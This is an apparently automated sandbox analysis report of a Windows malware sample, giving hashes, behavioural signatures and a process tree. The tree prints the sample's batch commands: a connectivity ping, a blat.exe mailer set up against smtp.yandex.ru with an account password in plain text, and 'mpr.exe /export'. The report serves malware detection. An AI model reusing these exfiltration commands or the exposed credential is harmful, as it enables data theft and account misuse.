Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/10/2024, 22:51
Behavioral task
behavioral1
Sample
4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
-
Size
1.1MB
-
MD5
4f73e81d0101de7157f5c2f005fb589d
-
SHA1
0f361bde4d40acccf35047ecb549f9215ca14465
-
SHA256
e66f7f877023fed0b8fcf763b4c06744f087f32c378e59c143a51e932d176c3e
-
SHA512
40383084fa3efc0603f187e9e67927b7949f29bb08504fc00dc5b77ea4998edb5da0c7f27fc848468a9459a940e2f0cca4d953e3c3515fddd06639766a95a663
-
SSDEEP
24576:NnLB6UAKy5FQKBIxV5E+BHB5gaeuJN5qX35:NnN6UE5uO+nv4
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
pid Process 3092 blat.exe 3892 MPR.exe -
resource yara_rule behavioral2/memory/2696-0-0x0000000000400000-0x0000000000799000-memory.dmp upx behavioral2/memory/2696-24-0x0000000000400000-0x0000000000799000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language blat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MPR.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2112 PING.EXE -
Modifies registry class 21 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf MPR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler" MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32 MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\ = "Implements DocHostUIHandler" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe \"%1\"" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler MPR.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8" MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe,0" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF} MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6E0C.tmp\\MPR.exe" MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}" MPR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "MPR.DocHostUIHandler" MPR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mpf MPR.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2112 PING.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3892 MPR.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3892 MPR.exe 3892 MPR.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2696 wrote to memory of 4104 2696 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe 85 PID 2696 wrote to memory of 4104 2696 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe 85 PID 2696 wrote to memory of 4104 2696 4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe 85 PID 4104 wrote to memory of 2112 4104 cmd.exe 89 PID 4104 wrote to memory of 2112 4104 cmd.exe 89 PID 4104 wrote to memory of 2112 4104 cmd.exe 89 PID 4104 wrote to memory of 3092 4104 cmd.exe 97 PID 4104 wrote to memory of 3092 4104 cmd.exe 97 PID 4104 wrote to memory of 3092 4104 cmd.exe 97 PID 4104 wrote to memory of 3892 4104 cmd.exe 98 PID 4104 wrote to memory of 3892 4104 cmd.exe 98 PID 4104 wrote to memory of 3892 4104 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\1.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\PING.EXEping ya.ru -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\blat.exeblat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u [email protected] -pw ttk20103⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\MPR.exempr.exe /export3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3892
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
357B
MD5d6b01433eba515a0fbdc965f97b231a7
SHA1ddad62300ccd645f4de785a28288b64b06fe3d51
SHA256e247b236776d88f357989b5a6093a3d0d32500ed27f6359d63f8dc80c8207ce4
SHA5123ae5f753988f4006c641c1ba1506e2695452a8953315878ac964bca326909cf28ee5adacbb291241a179e9c40eb4194319b1ac8921fc62786a7da2a75eb92271
-
Filesize
3.3MB
MD56faecfac8efa8c166d27b4325249de29
SHA11069b5203adca80a91aa12512cec93ac1344f277
SHA256ebe91e2a3e9b5ab00c659bf72e8899425522701c0fe48ac905228068565f1967
SHA512179461a31f21e47413226087d2d465ae787739fcc7d0cfb663f94ca69028dee5bbf77ab72c17caad6f72ff556beeefc9f1f29ec52909c710b6b112a29e4f6cc9
-
Filesize
112KB
MD531f84e433e8d1865e322998a41e6d90e
SHA1cbea6cda10db869636f57b1cffad39b22e6f7f17
SHA256aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e
SHA5127ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9